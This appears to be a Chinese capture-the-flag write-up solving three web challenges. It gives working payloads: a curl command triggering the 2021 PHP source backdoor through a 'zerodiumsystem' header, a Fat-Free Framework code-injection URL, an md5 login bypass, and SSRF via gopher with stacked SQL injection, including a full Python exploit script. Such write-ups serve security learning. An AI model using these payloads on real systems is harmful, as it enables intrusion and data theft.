[toc]

能给我们Web狗整点阳间的嘛???

签到

image-20210403165718991

进入题目是一个博客,在里面测试了一顿后没有发现什么漏洞。这个签到太TMD阴间了,如果不放提示的话这道题铁铁的就是0解了。

PHP作为目前主流的web服务器语言,目前在互联网占有60%以上的市场份额,作为服务器软件对安全的影响极大。3.28日发现一例PHP源码投毒事件,疑似git.php.net服务器被攻破,黑客进行了两次后门代码的提交,具体细节官方还在调查,已经将代码服务器迁移到了更加安全的github。后门代码逻辑是显而易见的,很快被作者发现,并将代码回滚。

下面尝试这个后门的利用方法:

1
curl -H "Accept-Encodeing: gzip,deflate" -H "User-Agentt: zerodiumsystem('cat /flag');" -v http://eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com/index.php

执行后得到如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
*   Trying 118.212.233.160:80...
* Connected to eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com (118.212.233.160) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com
> User-Agent: curl/7.74.0
> Accept: */*
> Accept-Encodeing: gzip,deflate
> User-Agentt: zerodiumsystem('cat /flag');
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 03 Apr 2021 03:09:04 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Vary: Accept-Encoding
< Vary: Accept-Encoding
< X-Via-JSL: 9450dd0,-
< Set-Cookie: __jsluid_h=5f9a20fe217702a0598a45a2a0c8ce13; max-age=31536000; path=/; HttpOnly
< X-Cache: bypass
<
flag{7aa7a410-7595-48e9-bc14-8ad5c1dd71f4}<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at REMOVETHIS: sold to zerodium, mid 2017:1) in <b>/var/www/html/htmlport.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>: session_start(): Session cannot be started after headers have already been sent in <b>/var/www/html/htmlport.php</b> on line <b>5</b><br />
<!DOCTYPE HTML>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>个人博客</title>
<meta name="keywords" content="个人博客" />
<meta name="description" content="" />
<link rel="stylesheet" href="css/index.css"/>
<link rel="stylesheet" href="css/style.css"/>
<script type="text/javascript" src="js/jquery1.42.min.js"></script>
<script type="text/javascript" src="js/jquery.SuperSlide.2.1.1.js"></script>
<!--[if lt IE 9]>
<script src="js/html5.js"></script>
<![endif]-->
</head>
......
* Connection #0 to host eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com left intact

如上所示,23 行得到flag。

unsetme

题目给了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
// Kickstart the framework
$f3=require('lib/base.php');

$f3->set('DEBUG',1);
if ((float)PCRE_VERSION<8.0)
trigger_error('PCRE version is out of date');

// Load configuration
highlight_file(__FILE__);
$a=$_GET['a'];
unset($f3->$a);

$f3->run();

Fat-Free Framework是一款主要使用PHP语言编写的开源Web框架。 Fat-Free Framework 3.7.1版本中存在注入漏洞。攻击者可利用该漏洞执行任意代码。链接:https://github.com/bcosca/fatfree-core/commit/dae95a0baf3963a9ef87c17cee52f78f77e21829

1
http://eci-2ze3piaq8erabuvlmwd3.cloudeci1.ichunqiu.com/?a=:[]);phpinfo();//

image-20210403121509038

然后执行如下即可得到flag:

1
http://eci-2ze3piaq8erabuvlmwd3.cloudeci1.ichunqiu.com/?a=:[]);system('cat /flag');//

“慢慢做”管理系统

image-20210403155558490

进入题目,一个登录框:

image-20210403155331451

前半个小时一直是0解的,直到放了提示:

1
SELECT * FROM users WHERE password = '".md5($password,true)."' limit 0,1";

很明显是 md5($password,true) 登录绕过:https://blog.csdn.net/March97/article/details/81222922

绕过方法有ffifdyop和129581926211651571912466741651878684928两种,但是ffifdyop被过滤了,这里使用第二个即可成功登录:

1
/?username=admin&password=129581926211651571912466741651878684928

登录成功后来到ssrf页面:

image-20210403155425684

使用0.0.0.0绕过内网地址访问admin.php:

1
/ssrf.php?way=0.0.0.0/admin.php

image-20210403155501174

接下来就是使用gopher协议利用ssrf进行sql注入了,因为直接在外网登录没有任何结果。给出一个gopher协议构造脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import urllib.parse
import requests

post_data = '''username=admin'+or+1=1#&password=123'''
post_data_length = len(post_data)
test =\
"""POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=2pavr80foc7vdc8m6ikg6ifns5;
Content-Length: {0}

""".format(post_data_length)
test += post_data
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
print(urllib.parse.quote(result)) # 因为是GET方法所以需要二次编码

首先构造sql万能密码进行测试:

1
username=admin'+or+1=1#&password=123    # 过滤了空格, 用+绕过

执行上面的gopher构造脚本得到flag:

1
/ssrf.php?way=gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250ACookie%253A%2520PHPSESSID%253D2pavr80foc7vdc8m6ikg6ifns5%253B%250D%250AContent-Length%253A%252036%250D%250A%250D%250Ausername%253Dadmin%2527%252Bor%252B1%253D1%2523%2526password%253D123

image-20210403155855250

如上图所示,存在sql注入并且把当前表的数据全部爆出来了。很明显当前得到的数据全是假的,我们要得到admin用户的真实密码就要去别的表看看。

经测试,username处存在堆叠注入,并且当前连接的数据库中除了上面爆出来的fake_admin表外还有一个 real_admin_here_do_you_find 表,很明显了,admin的真实密码在这个 real_admin_here_do_you_find 表中,而我们要做的就是使用堆叠注入修改表名。由于这两个表中的字段结构是一样的,我们就不需要alter语句了,只使用rename即可:

1
username=admin';rename+table+fake_admin+to+fake_admin1;rename+table+real_admin_here_do_you_find+to+fake_admin;#&password=123

执行后即可成功将real_admin_here_do_you_find表改为fake_admin表。然后我们再执行一次万能密码即可爆出原 real_admin_here_do_you_find 表中admin的真实密码:

1
username=admin'+or+1=1#&password=123

image-20210403160719336

然后再构造gopher利用ssrf去登陆admin,登录后使用内网的cookie去访问flag.php即可得到flag:

image-20210403171959229

给出一个完整利用的EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import urllib.parse
import requests
# rename table fake_admin to fake_admin3;rename table ctf.users to ctf2.fake_admin;show tables;
post_data = '''username=admin&password=5fb4e07de914cfc82afb44vbaf402203'''
post_data_length = len(post_data)
test =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=6o42rvm6k3urn764rin0mn17m6;
Content-Length: {0}

""".format(post_data_length)
test += post_data
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
payload = urllib.parse.quote(result)

url = "http://eci-2ze8pd94714jhax3okrx.cloudeci1.ichunqiu.com/ssrf.php?way="
headers = {
'Cookie': "PHPSESSID=03g366r9e95pcn68nh1vtvms82"
}
print(payload)
web = requests.get(url+payload,headers=headers)

print(web.text)
print(url+payload)

image-20210403171733322